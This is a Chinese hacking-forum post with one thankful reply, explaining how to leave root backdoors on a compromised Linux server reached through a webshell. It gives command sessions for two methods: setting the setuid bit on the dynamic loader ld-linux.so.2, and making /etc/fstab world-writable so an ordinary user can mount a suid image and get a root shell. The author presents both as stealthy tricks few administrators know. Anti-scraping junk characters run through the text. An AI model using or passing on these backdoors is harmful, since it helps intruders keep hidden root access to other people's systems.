中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]
作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
* x  U" J2 w& i1 J  e1 r2 Q* V; _' G0 o; p5 O( q
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
; Z5 P% e7 i. b) G9 ^& o% |- [6 Ulrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
( n# ]: i- y: wlrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
) `8 Z- h( P+ e3 M[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究( t- N8 R& y  g3 P4 t3 s
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
. c8 I" q2 q' a! I3 Z+ M! a-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
$ n# O2 k( _( ]lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究$ k9 J, e& N( b: p
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
# Y3 f/ U5 h! k" P" R我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究
/ R" t. ~+ @; x" ~/ I. n4 B. m0 g
' y2 T0 Y, W% F# I- l3 z普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究" ^6 v' \3 l3 s* @* `
/ i9 y) A- H" T+ A% K! C
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
6 m/ k& i1 y& p  ^' jxiaoyu2ezX-BUG-关注前沿信息安全技术研究% r* a, T% e' r+ y; p
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究
; b  O3 i; P" Q, C; j% }! L3 }7 Y! broot2ezX-BUG-关注前沿信息安全技术研究: e) l7 V+ I. \4 `1 i" F4 H+ T4 h
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
& b' \6 `  ?3 F' m& R0 }恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究# l9 s$ q: ]" N# \1 L

% @5 E% r1 M3 e2 `" W1 N方法二:2ezX-BUG-关注前沿信息安全技术研究: K' t4 `/ r5 r

0 k: a' A7 b; p* U5 L: X" w/ y看过程:2ezX-BUG-关注前沿信息安全技术研究
, D, z+ M4 `( X4 x6 u) s1 {& u" L- q* w% R
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
2 [6 N4 r/ `" J, v5 K' U( Y[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究
( t. K' |. G5 {8 u0 U- K# E( y  Z% @2 r
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究8 y, k/ @2 `* j! U8 ^$ H; L9 h
5 P0 T7 T+ |4 b
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
% V) O8 ?$ F+ _6 E. m. y: @1 c-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
" s4 G/ n' \+ K0 F/ a- {/ O; N; s[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究2 {  f. s; t. M1 T* E% t; e
# _' \& V7 ~& m* b" {& X9 U
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
; L; g! F+ N, Q- |% |
0 c8 R) Z3 i2 Q3 C[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
; ?& l- y  d$ _" a- x-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究8 s/ d# f$ \) _, \3 Q
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
8 a& _# }; I% S[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究
0 c0 t! ~4 m( N- w+ T+ p+ `[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
3 {" a' [& ^% H4 C/ Q2 a7 g' D$ S+ ototal 182ezX-BUG-关注前沿信息安全技术研究# S5 n. q+ z) O$ l
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究1 s/ F1 k, c2 e, L& y- S
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究/ D; l2 c) W& S0 ~8 M! N, m1 J; c
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究
3 c1 {  k+ U0 }! S* h/ Z3 Nsh-3.2#2ezX-BUG-关注前沿信息安全技术研究1 |6 Z  W, G3 A( ~: g
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
; w8 C. C* ~( k8 K% v- P7 ^test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
$ y5 X1 {! d2 @# ]$ Z/ M% l2 ~& C
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究, d/ r' d4 f3 a( p) j+ N
2ezX-BUG-关注前沿信息安全技术研究
, Q, p6 u( L3 D5 \- v' t8 i
0 v) S$ T6 _. v/ u& b3 \
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2